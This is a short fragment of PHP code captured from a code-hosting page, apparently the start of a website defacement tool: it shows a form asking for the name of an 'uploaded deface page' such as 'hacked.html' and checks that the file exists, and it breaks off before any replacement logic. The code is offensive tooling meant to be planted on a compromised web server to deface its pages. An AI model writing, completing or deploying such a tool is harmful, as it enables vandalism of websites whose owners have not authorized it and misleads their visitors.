You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
define("FORM",'<form method="GET">Enter the name of your uploaded deface page: <input name="deface" type="text" placeholder="hacked.html"/><input name="submit" type="submit" value="Deface"/>');
if (isset($_GET["deface"])){
if ($_GET["deface"] == ""){
die(FORM);
}
$f = $_GET["deface"];
if(!file_exists($f)){
echo "Couldn't find the deface page! ";
echo "Make sure that you've uploaded the ".htmlspecialchars($f)."!";